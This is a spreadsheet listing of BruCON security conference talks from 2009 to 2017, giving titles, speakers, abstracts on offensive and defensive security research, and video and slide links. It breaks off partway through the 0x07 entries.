BruCON - Talk overview - 2009 - 2017
 Share
The version of the browser you are using is no longer supported. Please upgrade to a supported browser.Dismiss

 
View only
 
 
ABCDEHIJKLMNOPQRSTUVWXYZAA
1
Type
Year
NameHostAbstractVIDEOSLIDES
2
Keynote
0x09
How hackers changed the security industry and how we need to keep changing itChris WysopalBefore hackers got involved in cybersecurity the industry was focused on products and compliance. Security was security features: firewalls, authentication, encryption. Little thought was given to vulnerabilities that allowed the bypassing of those features. Hackers came along with the idea that you use offensive techniques to simulate how an attacker would discover vulnerabilities in a networks, a system, or an application. Offensive skills have been on the rise ever since and now the best way to secure something it to try and break it yourself before the attacker does. At the L0pht Chris lived the arc from the underground, to consumer advocates, to speaking at the U.S. Senate, to forming a 200 employee security consultancy, to schooling Microsoft and changing how people build software. Hackers needed to make trouble to effect positive change and we need to keep making trouble or we will never get a more secure world.BruCON 0x09 - How hackers changed the security industry and how we need to keep changing it - Chris Wysopal.pdf
3
Talk
0x09
See no evil, hear no evil: Hacking invisibly and silently with light and soundMatt WixeyTraditional techniques for C2 channels, exfiltration, surveillance, and exploitation are often frustrated by the growing sophistication and prevalence of security protections, monitoring solutions, and controls. Whilst all is definitely not lost, from an attacker's perspective - we constantly see examples of attackers creatively bypassing such protections - it is always beneficial to have more weapons in one's arsenal, particularly when coming up against heavily-defended networks and highly-secured environments.

This talk demonstrates a number of techniques and attacks which leverage light and/or sound, using off-the-shelf hardware. It covers everything from C2 channels and exfiltration using light and near-ultrasonic sound, to disabling and disrupting motion detectors; from laser microphones, to catapulting drones into the stratosphere (or the ceiling if you're risk-averse); from trolling friends, to jamming speech and demotivating malware analysts. This talk not only provides attendees with a new suite of techniques and methodologies to consider when coming up against a well-defended target, but also demonstrates, in a hopefully fun and practical way, how these techniques work, their advantages, disadvantages, and possible future developments. It also gives details of real case studies where some of these techniques have been used, and provides defenders with realistic methods for the mitigation of these attacks.
Finally, the talk covers some ideas for future research in this area.
BruCON 0x09 - See no evil, hear no evil Hacking invisibly and silently with light and sound - Matt Wixey.pdf
4
Talk
0x09
XFLTReaT: a new dimension in tunnellingBalazs BucsayThis presentation will sum up how to do tunnelling with different protocols and will have different perspectives detailed. For example, companies are fighting hard to block exfiltration from their network: they use http(s) proxies, DLP, IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. Mitigation and bypass techniques will be shown you during this presentation, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.

Our new tool XFLTReaT is an open-source tunnelling framework that handles all the boring stuff and gives users the capability to take care of only the things that matter. It provides significant improvements over existing tools. From now on there is no need to write a new tunnel for each and every protocol or to deal with interfaces and routing. Any protocol can be converted to a module, which works in a plug-and-play fashion; authentication and encryption can be configured and customised on all traffic and it is also worth mentioning that the framework was designed to be easy to configure, use and develop. In case there is a need to send packets over ICMP type 0 or HTTPS TLS v1.2 with a special header, then this can be done in a matter of minutes, instead of developing a new tool from scratch. The potential use (or abuse) cases are plentiful, such as bypassing network restrictions of an ISP, the proxy of a workplace or obtaining Internet connectivity through bypassing captive portals in the middle of the Atlantic Ocean or at an altitude of 33000ft on an airplane.

This framework is not just a tool; it unites different technologies in the field of tunnelling. While we needed to use different tunnels and VPNs for different protocols in the past like OpenVPN for TCP and UDP, ptunnel for ICMP or iodined for DNS tunnelling, it changes now. After taking a look at these tools it was easy to see some commonality, all of them are doing the same things only the means of communication are different. We simplified the whole process and created a framework that is responsible for everything but the communication itself, we rethought the old way of tunnelling and tried to give something new to the community. After the initial setup the framework takes care of everything. With the check functionality we can even find out, which module can be used on the network, there is no need for any low-level packet fu and hassle. I guarantee that you won’t be disappointed with the tool and the talk, actually you will be richer with an open-source tool.

5
Talk
0x09
Knock Knock... Who's there? admin admin and get in! An overview of the CMS brute-forcing malware landscape.Anna Shirokova and Veronica ValerosWith more than 18M websites on the internet using WordPress [1] and hundreds of known vulnerabilities reported [2], this and other well known Content Management Systems (CMS) have been systematically attacked for the past years by different threat actors looking for disposable infrastructure for their attacks.

Brute-forcing is one of the most common types of attacks against CMS. The main goal of this attack is pretty straightforward: to obtain a valid username and password and get access to the CMS administration panel. Attackers take advantage of the fact that still, in most cases, CMSs chosen passwords are very weak: admin, 123456, qwerty, etc. Successfully brute-forced websites are commonly used for hosting C&Cs, scams, and drive-by attacks to spread malware or even for selling in the black market to interested parties.

The goal of this presentation is threefold: first, to outline different malware and botnets with CMS brute-forcing capabilities; second to provide a comparison of the most prominent brute-forcing botnets with a focus on their technical capabilities; third to present an in-depth analysis of a real life distributed brute-force attack on a popular CMS platform performed by a botnet known as Sathurbot.

While the trojan Sathurbot first appeared in 2013 [3], it is still active and affecting hundreds of users. To this date, the trojan has 4 known modules: backdoor, downloader, web crawler, and brute-forcing. The downloader module allows the trojan to deliver additional malware to the infected machine such as Boaxxe, Kovter, and Fleercivet. The web crawler module allows the trojan to search in different searching engines for websites using WordPress CMS. The brute-forcing module is what the trojan uses to attempt to login to the WordPress admin panels with different credentials. The case of study is focused on the web crawling and brute-forcing modules with specific insights obtained of a real life infection. It will provide insights of the infrastructure, target selection, aggressiveness, and an analysis of it's success from our observation.

As a final contribution, we will present some detection methods that can be used to identify CMS brute-forcing attacks.

[1] Built With. (2017, April). WordPress Usage Statistics. Retrieved from https://trends.builtwith.com/cms/WordPress [2] CVE Details. (2017, April). WordPress Security Vulnerabilities. Retrieved from https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/ [3] Krebs On Security. (2013, April) Brute Force Attacks Build WordPress Botnet. Retrieved from https://krebsonsecurity.com/2013/04/brute-force-attacks-build-wordpress-botnet/
https://www.youtube.com/watch?v=q0GlAWbMeMoBruCON 0x09 - Knock Knock... Who's there admin admin and get in! An overview of the CMS brute-forcing malware landscape - Anna Shirokova and Veronica Valeros.pdf
6
Talk
0x09
From Weakest Link to Retaliation Weapon: Building Efficient Anti-Social Engineering Awareness ProgramVolodymyr StyranAs many infosec practitioners, early in my career I tended to disregard security awareness. People can't change, I thought, and the evidence was there. No matter what we, as security community, did to make our less savvy colleagues avoid social engineering threats, it seemed that it didn't work. But it turned out that we just did the wrong things.

Much later, when I've become more familiar with the industry as a whole and the agendas that drive its players, I've realized that information security is simply not the field where the answers to the questions of human nature could be found. All infosec industry could offer, was moving "the user" as far as possible from the responsibility of their actions, normally by placing a bunch of intrusive software on their devices and some blinking boxed between them and the Internet.

But wait, I pondered, if the human being is so unreliable and irresponsible, how happened that the humanity survived the natural threats and developed into the species that dominates planet Earth? Could we draw analogies between the threats in the real, kinetic world and the "cyber space"? Could we then use the strategies that helped us fight (or rather flight) a bear… or a tiger… to survive this new jungle out there? It turns out we could.

During the last two years I've developed an efficient program that leads to significant increase in user resilience to modern cyber threats that employ social engineering principles and techniques. The approach it takes is backed by social psychology and behavioral science research results, as well as the track record of its successful application to the high-profile companies here in Ukraine, that face threats that are slightly unusual to most businesses abroad.

During the talk I will let you know how it works, why it works, and how you can make it work for your own or any other company.
https://www.youtube.com/watch?v=40tUy6TNXM8BruCON 0x09 - From Weakest Link to Retaliation Weapon Building Efficient Anti-Social Engineering Awareness Program - Volodymyr Styran.pdf
7
Talk
0x09
DYODE (Do Your Own Dyode)Arnaud SoulliéDYODE (Do Your Own Dyode) is a low cost, DIY data diode aimed at securing Industrial Control Systems. While data diodes have been used for a long time on classified networks, the high cost and complexity of implementation have kept them away from a lot of valid use cases on industrial control systems. During our assignments, we encountered many situations in which time or availability constraints were not really high -but the security risk was- and a commercial data diode way too costly.

We developed a working data diode using standard components and open source libraries. We want to prove with this project that it is possible to produce a simple, working, ICS oriented data diode for less than $200. The principles of using COTS components to make a data diode are not brand new, but we aim at providing a package software solution to ease the creation process, with a specific focus on ICS.

Our diode can be used for file transfer, Modbus data transfer as well as screen sharing for remote debugging.

We will demo v2 of the DYODE, a diode based on serial connection and optocoupler, that only allows very low speed exchanges (sufficient for Modbus) for an even cheaper cost (around 50$).
8
Talk
0x09
Weaponizing the BBC Micro:BitDamien CauquilIn 2015, BBC sponsored Micro:Bit was launched and offered to one million students in the United Kingdom to teach them how to code. This device is affordable and have a lot of features and can be programmed in Python rather than C++ like the Arduino. When we discovered this initiative in 2016, we quickly thought it was possible to turn this tiny device into some kind of super-duper portable wireless attack tool, as it is based on a well-known 2.4GHz RF chip produced by Nordic Semiconductor.

It took us a few months to hack into the Micro:Bit firmware and turn it into a powerful wireless attack tool able to sniff keystrokes from wireless keyboards or to hijack and take complete control of quadcopters during flight. We also developed many tools allowing security researchers to interact with proprietary 2.4GHz protocols, such as an improved sniffer inspired by the mousejack tools designed by Bastille. Source code of our custom firmware and related tools are opensource.

The Micro:Bit will become a nifty platform to create portable RF attack tools and ease the life of security researchers dealing with 2.4GHz protocols !
9
Talk
0x09
Secure channels: Building real world crypto systemsSander DemeesterSecure communication is one of the most common, most important real world application of cryptography today. But besides being one of the most important requirements of modern communication systems people still keep getting this wrong. And it’s not fully clear why that is. In this presentation we are going to explore the cryptography that is involved in building secure channels (the theory and the practice) We are going to look at different secure channel concepts: - Authenticated key establishment protocol; - Key derivation phases; - Protecting data using the derived key (typically using authenticated encryption).

Followed by an in-depth look of typical properties that we require of such channels and the specific cryptographic constructions that accomplish these properties. We will look at the following properties: - Data confidentiality; - Data integrity; - Authenticity of the messages.

We will explain some of the most famous security bugs in TLS and SSH and why they came to be by exploring the “cryptographic doom principle” and some of the proposed fixes. In the second part of this presentation we are going to look at some recent efforts into secure secure channel implementations (SSH and TLS 1.3), and what the proposed fixes entailed.

Attendees will learn what a cryptographic secure channel is and what typical cryptographic constructions are involved in creating such a channel.
https://www.youtube.com/watch?v=1ypA7r6CDZ0BruCON 0x09 - Secure channels Building real world crypto systems - Sander Demeester.pdf
10
Talk
0x09
MEATPISTOL, A Modular Malware Implant FrameworkJosh Schwartz and John CrambAttention Red Teamers, Penetration Testers, and Offensive Security Operators, isn’t the overhead of fighting attribution, spinning up infrastructure, and having to constantly re-write malware an absolute pain and timesink!?! It was for us too, so we’re fixing that for good (well, maybe for evil). Join us for the public unveiling and open source release of our latest project, MEATPISTOL, a modular malware framework for implant creation, infrastructure automation, and shell interaction.

This framework is designed to meet the needs of offensive security operators requiring rapid configuration and creation of long lived malware implants and associated command and control infrastructure. Say goodbye to writing janky one-off malware and say hello to building upon a framework designed to support efficient yoloscoped adversarial campaigns against capable targets.
11
Talk
0x09
Open Source Security OrchestrationGregory PickettMy original question was “How do I share a Fail2ban jail?” But there are many other questions aren’t there? How do we get to threats in time? How do we make sure that the evidence that we need gets captured or that the threat is stopped before it is too late? How do we do all this with a limited staff? We only have so many people. The answer to that is orchestration. Of course, the vendors can offer you something. As long as you want to pay lots of money, setup a complicated product, they got you covered. Seriously! I just want these two boxes talking. If this happens, I want this to happen. Can we just do that without some major operation? Yes. It turns out that we can.

We’ll start with Adaptive Network Protocol (ANP) which was developed so that nodes can share event information with each other. Install an ANP agent, peer it with as many systems as you want so that they can begin sharing, and then add an interface for every action that you would like a system to take when it sees a particular event. It is that easy.

In this session, we’ll show you how ANP works, how to install it, and cover all the use cases from generating your own Threat Intelligence feed, to sharing fail2ban jails across clouds, to automatically NATing threats to honeypots, and many more. To show you how it works, I will even demo some of these scenarios. What's more, you can take ANP home with you so that you too can use it to automate your network defenses. Because when it comes to defending your network, responding quickly can mean all the difference and with ANP you can do that.
https://www.youtube.com/watch?v=EnQ6rA6XEIUBruCON 0x09 - Open Source Security Orchestration - Gregory Pickett.pdf
12
Talk
0x09
Detecting malware even when it is encrypted - Machine Learning for network HTTPS analysisFrantišek Střasák and Sebastian GarciaWith the increasing amount of malware HTTPS traffic, it is a challenge to discover new features and methods to detect malware without decrypting the traffic. A detection method that does not need to unencrypt the traffic is cheaper (because no traffic interceptor is needed), faster and private, respecting the original idea of HTTPS. Our research goal is to detect malware HTTPS connections using data from Bro IDS logs [1], that does not need to unencrypt the traffic.

We created and extracted our features from data logs that the Bro IDS is able to generate from a pcap file. Bro offers information about flows, SSL handshakes and X.509 certificates. These three types of data give us enough information to create powerful features and machine learning algorithms to detect the malicious HTTPS traffic with good accuracy.

Our machine learning algorithm uses 30 different features. These features are divided into features for flows, features for SSL handshakes and features for X.509 certificates. One of our main contributions is that our data model is based on connection 4-tuples. A connection 4-tuple aggregates the group of flows which share the same SrcIP, DstIP, DstPort, and protocol. Therefore, each connection summarizes the behavior of the malware while connecting to the same C&C server. Such aggregation proved paramount for the success of our method.

A core part of our research was the production and selection of correct datasets. We used 13 datasets from the CTU-13 malware dataset [2], 55 malware datasets from the Stratosphere Malware Capture Facility Project (done by Maria Jose Erquiaga)[3] and we produced 20 of our own normal datasets. Each dataset was processed to extract the Bro files from the original pcap files. Afterwards, each dataset was labeled using our expert knowledge. The Amount of malware and normal traffic in our entire dataset is balanced.

Our detection method consisted in using and comparing several machine learning algorithms to learn how the normal HTTPS traffic differs from the malware HTTPS based on our behavioral features. Our results show that malware HTTPS behaviour is distinct from normal HTTPS behaviour and that our methods are able to detect malware with good accuracy without decrypting the traffic.

[1] https://www.bro.org/ [2] https://stratosphereips.org/category/dataset.html [3] https://mcfp.felk.cvut.cz/publicDatasets/
https://www.youtube.com/watch?v=jlEbsXTKGcQBruCON 0x09 - Detecting malware even when it is encrypted - Machine Learning for network HTTPS analysis -František Střasák and Sebastian Garcia.pdf
13
Talk
0x09
Evading Microsoft ATA for Active Directory DominationNikhil MittalMicrosoft Advanced Threat Analytics (ATA) is a defense platform which reads information from multiple sources like traffic for certain protocols to the Domain Controller, Windows Event Logs and SIEM events. The information thus collected is used to detect Reconnaissance, Credentials replay, Lateral movement, Persistence attacks etc. Well known attacks like Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Golden Ticket, Directory services replication, Brute-force, Skeleton key etc. can be detected using ATA. Whenever communication to a Domain Controller is done using protocols like Kerberos, NTLM, RPC, DNS, LDAP etc., ATA will parse that traffic for gathering information about not only possible attacks but user behavior as well. It slowly builds an organizational graph and can detect deviations from normal behavior.

Is it possible to evade this solid detection mechanism? What are the threats which ATA misses by design? How do Red Teamers and Penetration Testers can modify their attack chain and methodology to bypass ATA? Can we still have domain dominance?
https://www.youtube.com/watch?v=5gu4r-IDDwUBruCON 0x09 - Evading Microsoft ATA for Active Directory Domination - Nikhil Mittal.pdf
14
Talk
0x09
Browser Exploits? Grab them by the collar!Debasish MandalAPT has become a hot topic in enterprise IT today. One of the softwares that we see becomes victim of APT attack more often is web browsers and the attack surface is becoming bigger and bigger every day.

TCP Live Stream Injection (https://en.wikipedia.org/wiki/Packet_injection) is a technique that we have seen, is being abused by various Internet Service Providers, Router vendors for decades. We have seen in the past, using this technique ISPs, router vendors intercepts HTTP traffic and inject arbitrary data silently into HTTP responses. This is usually done by injecting arbitrary JavaScript code into actual HTTP response body in real time. When the injected JavaScript code reaches client browser it performs various operations such as loading advertisements, information gathering etc.

This paper presents a generic browser exploit detection technique that uses the same Live Network Stream Code Injection technique to reliably catch browser exploits. The detection system can be considered as completely agent less and capable of detecting various techniques, used in modern browser exploitation. Unlike any other Host Based Intrusion Prevention Systems, to be able to generically detect and block browser exploits, no OS API hooking, dll injection or code injection is required in browser process.
BruCON 0x09 - Browser Exploits Grab them by the collar! - Debasish Mandal.pdf
15
Keynote
0x09
The cyber short. A market solution for product safety and corporate governance.Justine BoneThe Bug Short: What I learned on the way to Wall Street. Justine Bone presents the world's first ever cyber security-backed short position.

As CEO of MedSec, Justine and her team successfully utilized cybersecurity research to impact company performance. Working in partnership with the Muddy Waters investment fund, Justine changed the calculus of how security experts can invest, conduct, and deliver research. Justine describes the factors, gotchas, and preparation required to embark and execute on such a project, enacting a new way to monetize vulnerabilities and address the dysfunctional market around product security.
https://www.youtube.com/watch?v=LPhxn8pJFyUBruCON 0x09 - The cyber short. A market solution for product safety and corporate governance. - Justine Bone.pdf
16
17
Talk
0x08
Building A Successful Internal Adversarial Simulation TeamChris Gates and Chris NickersonThe evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us.
Building
https://www.youtube.com/watch?v=Q5Fu6AvXi_ABruCON 0x08 - Adversarial Simulation Team.pptx
18
Talk
0x08
What Does The Perfect Door Or Padlock Look Like?Deviant OllamYou have spent lots of budget on a high-grade, pick-resistant lock for your door. Your vendor has assured you how it will resist attack and how difficult it would be for someone to copy your key. You’ve carefully chosen robust and heavy-duty padlocks to secure your critical infrastructure and grounds. Your Plant Ops people feel assured that outsiders wouldn’t dare try to pick or smash such a lock open. Maybe they’re right. But... the bulk of real-world attacks that both penetration testers and also criminals attempt against doors and padlocks have little or nothing to do with the locking mechanism itself! This talk will be a hard-hitting exploration (full of photo and video examples) of the ways in which your doors and padlocks -- the most fundamental parts of your physical security -- can possibly be thwarted by someone attempting illicit entry via means that don’t involve intricate pick tools or finesse techinques. Bypassing and quick entry are often possible on our physical security hardware due to systemic and simple vulns that we have not yet eradicated. The showcasing of these scary problems will be immediately followed by bulleted lists of simple solutions that are instantly implementable and usually very withinbudget. You, too, can have a near-perfect doors or padlocks... if you’re willing to learn and understand the problems that all such hardare tends to have out of the box.
https://www.youtube.com/watch?v=4skSBwBBI-sBruCON 0x08 - Perfect Doors and Padlocks.pdf
19
Keynote
0x08
Keynote - Inventing DefenseAllison Miller<<MISSING INFO>>https://www.youtube.com/watch?v=8Uud4ZtbKyI<<MISSING>>
20
Talk
0x08
DecepticonR. Nandedkar-Amrita Iyer-Krishnakant PatilDecepticon” is an attempt to write a marginally intelligent bot capable of operating on IEEE 802.11 standards, which will launch as an Evil Twin Attack and will operate in the mode of execution with a lot of added smartness/intelligence. The brief course of talk is, Evil Twin Attack and its evolution from the normal evil twin attack to Decepticon, the need for evolution of Evil Twin Attack, drawbacks of Evil Twin and enhancements considered so far in Decepticon, the challenges we faced and our ways to solve some of them.
https://www.youtube.com/watch?v=e76Y2qVpFzABruCON 0x08 - Decepticon.pptx
21
Talk
0x08
Anti-Forensics AFDual CoreThis presentation is the screaming goat anti-forensics version of those ‘Stupid Pet Tricks’ segments on late night US talk shows. Nothing ground-breaking here, but we’ll cover new and trolly techniques that forensic investigators haven’t considered or encountered. Intended targets cover a variety of OS platforms.
https://www.youtube.com/watch?v=8q_1VF7jJ3g<<MISSING>>
22
Talk
0x08
Security Through DesignJelle NiemantsverdrietIn this session we will explore why certain devices, pieces of software or companies lead us to utter frustration while others consistently delight us and put a smile on our face. With these insights in mind, we will explore how we typically create our security processes, teams and solutions. All too often we create something without properly understanding what our colleagues or customers are trying to achieve only to bombard them with awareness training and policies because they “just don’t get it” and because “humans are the weakest link”. We will look at user-centered design methods and concepts from other disciplines like economy, psychology or marketing that can help us to build security in a truly usable way not just our tools but also the way we setup our teams, the way we communicate and the way we align incentives. Every interaction with security is an opportunity to improve convenience and bring a smile to somebody’s face. By understanding the impact of design, we can do a lot to improve corporate productivity and security itself.https://www.youtube.com/watch?v=5ODAhA-r3xUBruCON 0x08 - Security Through Design.pdf
23
Talk
0x08
Esoteric Web Application VulnerabilitiesAndres RianchoThis talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let’s explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution. Topics we’ll be covering: * Aggressive input decoding * Nil, NULL and password reset tokens * Host header manipulation * (quick) X-Forwarded-For: 127.0.0.1 * ActiveSupport::MessageVerifier Remote Code Execution * Insecure Paypal IPN implementations https://www.youtube.com/watch?v=V8_Ozpl_eyo<<MISSING>>
24
Talk
0x08
Scraping Leaky Browsers for fun and PasswordsStefaan Truijen - Adrian TomaOne of the most commonly used applications on desktop systems are web browsers. We identified that the latest versions of Microsoft Internet Explorer Edge, Google Chrome and Mozilla Firefox all contain vulnerabilities with regards to memory management of sensitive data. Concretely, they keep clear-text credentials in memory long after they have been entered and the designated tab is closed, allowing an adversary to recover this sensitive data as long as the web browser is running. This could prove very useful in certain forensic investigations, or be abused by an attacker to stealthily harvest website credentials without the need to install additional malware (e.g. a keylogger). As a Proof-of-Concept for the vendors, we have implemented a Volatility Framework Plugin that allows to harvest website credentials from a memory dump. This plugin will be open-sourced after this talk. Additionally, we will share the response of the three vendors on our PoC. The idea of the research came from NVISO, a young Belgian Cyber Security firm. KULeuven student Stefaan Truijen performed his Computer Science Master Thesis on the subject and compared the susceptibility of each browser under certain conditions (e.g. influence of private browsing mode, ...). HEB ESI student Adrian Toma developed the Volatility Framework plugin during the internship for his Second Bachelor Degree in Networks and System Security at NVISO.
https://www.youtube.com/watch?v=RInjKewZ6Q0BruCON 0x08 - Scraping Leaky Browsers.pptx
25
Keynote
0x08
Keynote - The Birth Of A DisciplineCorey Schou<<MISSING INFO>>https://www.youtube.com/watch?v=c1Q7yIPbJ1gBruCON 0x08 - The Birth of a Dicipline.pptx
26
Talk
0x08
Virtual Terminals, POS Security and becoming a billionaire overnightGrigorios FragkosVery few people use cash nowadays, as most use a debit or a credit card for their everyday needs. These transactions are performed through a Point-of-Interaction (POI) device or through a Virtual Terminal. Although payment terminals and virtual terminals make use of strong encryption and secure communications channel the Point of Sale (POS) is still a target for criminals. The malware affecting point of sale systems seen in previous years demonstrates that criminals continually adapt to find ways to target card payment channels and keep the cycle going. Following on the above, during this presentation, a number of features (provided in POI devices as standard functionality) and the ability to misuse them during a transaction will be demonstrated. But the main focus will be on a Threat Modelling engagement, undertaken against Virtual Terminals. More specifically, it will demonstrated how POS malware can shift and instead of targeting Card Holder Data (CHD) can targets the actual money directly. In other words, I will show you how someone ended up with billions overnight, without having to steal a single card number.https://www.youtube.com/watch?v=OfZiZRtg3aQ<<MISSING>>
27
Talk
0x08
Hacking KPN: Lessons From The TrenchesJeremy Goldstein and Bouke Van LaethemThis talk will dive into three very different but equally interesting vulnerabilities, from the perspective of the in-house penetration testing done by the KPN (Royal Dutch Telecom) REDteam. We’ll not only go into the technical details of the vulnerabilities, but also share some tips and tricks on how we handle things like reporting, emotional counselling of internal stakeholders, browbeating vendors, etc. One vulnerability will demonstrate how pervasive the relatively recently announced Java Deserialisation vulnerability is. This will show an interesting example of where this vulnerability can show up and we’ll also release an update to a tool to detect this variation. We’ll guide you through the process of discovery and exploitation via an enterprise mobile app that was completely unexpected. Another vulnerability will show how simple it sometimes is to bypass or abuse “enterprise grade” solutions, in this case a security device for mobility management. Some of you might also be suffering through vulnerability disclosures and because pain shared is pain divided, we’ll go into how the KPN-CERT has tried to deal with this. A last vulnerability will demonstrate reverse engineering crypto out of an inhouse developed binary with a surprising KISS lesson learned after testing was done. You can expect useful tips and tricks for getting to the core of crypto functionality and then extracting it out for fun and profit (ok, maybe not profit).
https://www.youtube.com/watch?v=iTGvbi_wLE0BruCON 0x08 - Hacking KPN.pdf
28
Talk
0x08
New Adventures In Active Defense, Offensive…John StrandThe current threat landscape is shifting. Traditional defenses are failing us. We need to develop new strategies to defend ourselves. Even more importantly, we need to better understand who is attacking us and why. You may be able to immediately implement some of the measures we discuss in this course, while others may take a while. Either way, consider what we discuss as a collection of tools at your disposal when you need them to annoy attackers, determine who is attacking you, and, finally, attack the attackers.
https://www.youtube.com/watch?v=mjxE1ZzWA5ABruCON 0x08 - Active Defense.pptx
29
Talk
0x08
Hello To The Dark SideL. GrecsIn the aftermath of the fall of Evernote as an inexpensive threat intel platform, free and low cost solutions have awoken from its dismantled remains to give hope to defenders everywhere. This presentation continues on with grecs’ threat intel series of talks covering lessons learned from his Evernote experiment and pivots towards improved data structures and newly discovered enterprise-friendly intelligence platforms to support them. https://www.youtube.com/watch?v=Tb8ywVuhiiA<<MISSING>>
30
Talk
0x08
Smart Sheriff, Dumb Idea.Abraham Aranguren & Fabian FässlerWould you want to let your kids discover the darker corners of the internet without protection? Wouldn’t it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games? Worry no longer, the South Korean government got you covered. Simply install the “Smart Sheriff” app on your and your kids’ phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring! Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn’t solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved into the first and, who would have guessed, second penetration test against the “Smart Sheriff” app, will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then? We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right?
https://www.youtube.com/watch?v=AbGX67CuVBQBruCON 0x08 - Smart Sheriff Dumb Idea.pdf
31
Talk
0x08
Invoke obfuscation powershell obfusk8tion techniquesDaniel BohannonThe very best attackers hide their commands from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, network defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs. We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen neverbefore-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
https://www.youtube.com/watch?v=DLtJTxMWZ2o<<MISSING>>
32
33
Talk
0x07
CVE-SearchAlexandre Dulaunoy & Pieter-Jan MoreelsCve-search is a free software to collect, search and analyse common vulnerabilities and exposures in software. cve-search grown organically over the past months in a modular system to fetch, index, search and analyse Common Vulnerabilities and Exposures (CVE) and Common Platform Enumeration (CPE) as published by the US agency NIST.
https://www.youtube.com/watch?v=GyhvnX3BuTUBruCOn 0x07 - CVE Search.pdf
34
Keynote
0x07
Keynote - Looking Forward - Finding the right balance for INFOSECDavid KennedyWow. We’ve come a long way. Some would say not nearly far enough – but will it never be perfect? This industry has a lot of problems, and issues that need fixing but there’s so many good things that we’ve done to make the world a safer place. This talk will look at what we’ve done so far, the breaches we see and why they are still there, and what we need to continue to do to move forward. I’ll also be demonstrating (with live demos) some of the pitfalls of a lot of the “advanced” prevention technologies and why technology still struggles with stopping attackers.
https://www.youtube.com/watch?v=lqsN2T4RoJwBruCOn 0x07 - Infosec Today.pdf
35
Talk
0x07
OSXCollector: Automated forensic evidence collection & analysis for OS XKuba SendorWe use Macs a lot at Yelp, which means that we see our fair share of Mac-specific security alerts. Host based detectors will tell us about known malware infestations or weird new startup items. Network based detectors see potential C2 callouts or DNS requests to resolve suspicious domains. Sometimes our awesome employees just let us know, “I think I have like Stuxnet or conficker or something on my laptop.” When alerts fire, our incident response team’s first goal is to “stop the bleeding” – to contain and then eradicate the threat. Next, we move to “root cause the alert” – figuring out exactly what happened and how we’ll prevent it in the future. One of our primary in-house Forensics and Incident Response (DFIR) tools for root causing OS X alerts is OSXCollector.
https://www.youtube.com/watch?v=l-lhyPcSd6IBruCON 0x07 - OSXCollector.pdf
36
Talk
0x07
Advanced WiFi Attacks using Commodity HardwareMathy VanhoefThis talk explains how advanced low-layer attacks against WiFi can be implemented by modifying the firmware of off-the-shelf WiFi dongles. This allows us to use cheap 15$ WiFi dongles to carry out attacks which previously required expensive USRP setups of more than 3500$. Several types of attacks are implemented and tested. First, we show how to give ourselves a higher throughput than normally allowed. While there are some systems that attempt to detect such selfish behavior, we show that these can easily be bypassed. We then continue by creating a continuous jammer. Such a jammer makes the channel completely unusable for all devices. Based on this we also show how to implement a selective jammer, allowing one to jam only packets of specific clients. This is achieved by decoding the MAC header of a packet while it is still being transmitted, and jamming the remaining content of this packet if it is send towards (or from) a client we are targeting. It’s surprising all this is possible using cheap hardware, in particular the selective jammer, since it must adhere to very strict timing constraints in order to timely jam the remaining content of the packet. We also turn our jamming attacks around and explain how they can be utilized to protected networks and devices. All combined this clearly shows jamming techniques can no longer be ignored. Finally we demonstrate how our low-layer attacks facilitate attacks against higher-layer protocols. In particular we use our modified firmware to implement a channel-based man-in-the-middle attack. This allows reliable manipulation of encrypted traffic, and can be utilized to break WPA-TKIP when used to protect broadcast packets. Interestingly we found that, though TKIP is nowadays rarely used to protect unicast traffic, it is still widely used to protect broadcast traffic.
https://www.youtube.com/watch?v=ak9vU1hpjhMBruCON 0x07 - Advanced Wifi Attack Using Commodity Hardware.pdf
37
Talk
0x07
